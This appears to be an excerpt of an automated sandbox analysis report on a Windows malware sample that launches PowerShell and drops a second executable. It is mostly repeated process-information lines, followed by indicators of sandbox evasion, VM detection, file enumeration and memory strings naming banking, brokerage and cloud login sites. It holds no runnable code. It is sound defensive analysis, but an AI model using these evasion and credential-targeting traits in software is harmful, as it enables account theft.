Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\9RM52QaURq.exe	Memory allocated: 2EC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Memory allocated: 3080000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Memory allocated: 2EC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Memory allocated: 7C50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Memory allocated: 33C50000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\9RM52QaURq.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\Desktop\9RM52QaURq.exe	Window / User API: threadDelayed 6285	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Window / User API: threadDelayed 3659	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6674	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3045	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_8-77404

Source: C:\Users\user\Desktop\9RM52QaURq.exe TID: 3496	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe TID: 3496	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6636	Thread sleep count: 6674 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6672	Thread sleep count: 3045 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1424	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89AC98C0 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,	8_2_0000018C89AC98C0
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89AC9810 FindClose,FindFirstFileExW,GetLastError,	8_2_0000018C89AC9810
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89AE20F8 FindFirstFileW,	8_2_0000018C89AE20F8

Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe

Code function: 8_2_0000018C89A913B0 GetLogicalDriveStringsW,

8_2_0000018C89A913B0

Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe

Code function: 8_2_0000018C89AA7348 VirtualQuery,GetSystemInfo,VirtualAlloc,VirtualProtect,

8_2_0000018C89AA7348

Source: C:\Users\user\Desktop\9RM52QaURq.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	File opened: D:\sources\migration\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	File opened: D:\sources\replacementmanifests\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	File opened: D:\sources\migration\wtr\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	File opened: D:\sources\replacementmanifests\microsoft-activedirectory-webservices\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	File opened: D:\sources\replacementmanifests\microsoft-client-license-platform-service-migration\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	File opened: D:\sources\replacementmanifests\hwvid-migration-2\	Jump to behavior

Source: wbfTHB1mDB.exe, 00000008.00000003.2574834908.0000018C89D09000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: wbfTHB1mDB.exe, 00000008.00000003.2574834908.0000018C89D09000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: wbfTHB1mDB.exe, 00000008.00000003.2574834908.0000018C89D09000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: 9RM52QaURq.exe, 00000000.00000002.3256613758.0000000007489000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZ
Source: wbfTHB1mDB.exe, 00000008.00000003.2574834908.0000018C89D09000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696487552f
Source: wbfTHB1mDB.exe, 00000008.00000003.2574834908.0000018C89D09000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: wbfTHB1mDB.exe, 00000008.00000003.2574834908.0000018C89D09000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: wbfTHB1mDB.exe, 00000008.00000003.2571914766.0000018C880FF000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000002.2648647506.0000018C880C6000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000002.2650409439.0000018C89C20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wbfTHB1mDB.exe, 00000008.00000003.2574834908.0000018C89D09000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: wbfTHB1mDB.exe, 00000008.00000003.2571914766.0000018C880FF000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000002.2648647506.0000018C880C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW)
Source: wbfTHB1mDB.exe, 00000008.00000003.2574834908.0000018C89D09000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: wbfTHB1mDB.exe, 00000008.00000003.2574834908.0000018C89D09000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: wbfTHB1mDB.exe, 00000008.00000003.2574834908.0000018C89D09000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696487552
Source: wbfTHB1mDB.exe, 00000008.00000003.2574834908.0000018C89D09000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: wbfTHB1mDB.exe, 00000008.00000003.2574834908.0000018C89D09000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696487552
Source: wbfTHB1mDB.exe, 00000008.00000003.2574834908.0000018C89D09000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: wbfTHB1mDB.exe, 00000008.00000003.2574834908.0000018C89D09000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: wbfTHB1mDB.exe, 00000008.00000003.2574834908.0000018C89D09000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: wbfTHB1mDB.exe, 00000008.00000003.2574834908.0000018C89D09000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: wbfTHB1mDB.exe, 00000008.00000003.2574834908.0000018C89D09000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: 9RM52QaURq.exe, 00000000.00000002.3256613758.0000000007489000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wbfTHB1mDB.exe, 00000008.00000003.2574834908.0000018C89D09000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: wbfTHB1mDB.exe, 00000008.00000003.2574834908.0000018C89D09000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: wbfTHB1mDB.exe, 00000008.00000003.2574834908.0000018C89D09000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: wbfTHB1mDB.exe, 00000008.00000003.2574834908.0000018C89D09000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: wbfTHB1mDB.exe, 00000008.00000003.2574834908.0000018C89D09000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: wbfTHB1mDB.exe, 00000008.00000003.2574834908.0000018C89D09000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: wbfTHB1mDB.exe, 00000008.00000003.2574834908.0000018C89D09000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
